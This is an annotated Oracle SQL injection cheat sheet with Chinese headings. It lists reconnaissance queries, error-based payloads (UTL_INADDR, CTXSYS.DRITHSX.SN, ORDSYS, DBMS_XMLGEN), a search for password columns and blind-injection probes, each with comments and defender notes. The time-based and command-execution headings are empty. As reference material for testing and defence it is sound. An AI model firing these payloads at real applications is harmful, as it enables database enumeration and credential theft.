Oracle

版本

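-- Returns the current session user and the version banner rows as one
-- single-column result set.
-- Fix: the second branch selects `banner` explicitly instead of `*`. A UNION
-- needs the same column count on both sides, and `SELECT *` only matches the
-- one-column first branch on releases where v$version has exactly one column;
-- elsewhere the statement fails with a column-count mismatch.
-- Defender note: a version banner appearing in an application response or
-- error page is a strong signal that query text is being built from input.
SELECT user FROM dual UNION SELECT banner FROM v$version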

数据库名

-- Four alternative ways to read the database / instance identity.
-- GLOBAL_NAME is a one-row view holding the database global name.
SELECT global_name FROM global_name;
-- V$DATABASE and V$INSTANCE are dynamic performance views; whether an
-- application account can read them depends on its grants.
-- NOTE(review): confirm against the account's actual privileges.
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
-- Evaluated as an expression against DUAL rather than read from a V$ view.
SELECT SYS.DATABASE_NAME FROM DUAL;

列库

-- Lists each schema that owns at least one table the current user can access.
-- ALL_TABLES is filtered by the caller's privileges, so a least-privilege
-- application account narrows what this returns.
SELECT DISTINCT owner FROM all_tables;

列表

-- Table names accessible to the current user, without and with the owning schema.
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
-- Tables that have a column whose name contains PASS. The pattern is upper
-- case because the dictionary stores unquoted identifiers in upper case.
-- Defender note: data-dictionary lookups like this coming from an application
-- account are unusual in normal operation and worth auditing.
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';

列字段

-- Column names of one table; 'blah' and 'foo' are placeholders for the table
-- and its owning schema.
-- NOTE(review): the dictionary stores unquoted identifiers in upper case, so
-- lower-case literals match only objects created with quoted lower-case names.
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';

##### 基于报错注入

描述
执行

不合法的HTTP请求

-- Passes the first v$version banner row as the argument of
-- UTL_INADDR.GET_HOST_NAME. The lookup is expected to fail; the technique
-- depends on the resulting ORA- error text containing the argument and on the
-- application returning that text to the client.
-- Defender note: return generic error pages instead of database error text,
-- and on releases that enforce network ACLs for UTL_INADDR do not grant the
-- resolve privilege to application accounts.
SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual

CTXSYS.DRITHSX.SN

-- Calls CTXSYS.DRITHSX.SN with the session user and the first version banner
-- row as arguments; presumably the call fails and the error text echoes the
-- second argument. NOTE(review): confirm on the target release.
-- Defender note: this only works where the CTXSYS schema is installed and the
-- calling account can execute the function; review EXECUTE grants to PUBLIC.
SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual

不合法的 XPath

-- Passes the first version banner row as the first argument of
-- ORDSYS.ORD_DICOM.GETMAPPINGXPATH; presumably the value is rejected as an
-- invalid XPath and quoted back in the error. NOTE(review): confirm.
-- Defender note: depends on the ORDSYS package being installed and executable
-- by the calling account, and on error text reaching the client.
SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual

不合法的 XML

-- Builds an inner query string in which the session user name is spliced in
-- as a double-quoted identifier, then hands it to DBMS_XMLGEN.GETXML. The
-- inner query selects a column with that name from sys.dual; presumably it
-- fails as an invalid identifier and the error names it. NOTE(review): confirm.
-- Defender note: the leak depends on error text being returned to the client.
SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual

不合法的 XML

-- Aggregates every ALL_USERS.username into one string: each name is wrapped in
-- an <s> element with a trailing comma, the elements are concatenated with
-- XMLAGG, the text is extracted, and RTRIM removes the final comma.
-- NOTE(review): nothing in this statement forces an error; presumably it is
-- listed here as a way to return many rows as a single value.
SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users

SQL Error

-- Returns the length of one username from SYS.ALL_USERS as text, or a single
-- space (CHR(32)) when the length is NULL. The inline view aliases ROWNUM as
-- LIMIT so that one row can be picked by number.
-- NOTE(review): the trailing `))` has no matching opening parentheses on this
-- line, so the statement does not parse on its own; presumably it is written
-- to close a surrounding query — confirm.
SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))

##### 盲注

描述
执行

版本 12.2

-- Counts the v$version banner rows that start with 'Oracle' and contain
-- '12.2'; a non-zero count answers the yes/no question "is this 12.2?".
SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';

Subselect 启用

-- Returns one row when a scalar subquery is accepted in the WHERE clause.
SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)

表log_table存在

-- Existence probe for log_table: the statement errors when the table is
-- missing or not accessible to the current user.
-- NOTE(review): the scalar subquery also errors when log_table holds more
-- than one row and returns no row when it is empty, so the result depends on
-- the row count as well as on existence.
SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);

字段信息存在于 log_table

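-- Counts columns named MESSAGE on LOG_TABLE in the current user's own schema
-- (USER_TAB_COLS covers only objects owned by the session user).
-- Fix: the keyword was misspelled `SELEC`, which is a syntax error.
SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';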

第一个字符为t

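-- Returns at most one log_table row whose message starts with 't'; an empty
-- result means no such row was found.
-- Fix: the keyword was misspelled `SELEC`, which is a syntax error.
-- Defender note: yes/no probes like this are only reachable when request
-- input is concatenated into query text; bind variables remove that path.
SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';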

##### 时间类型注入

命令执行
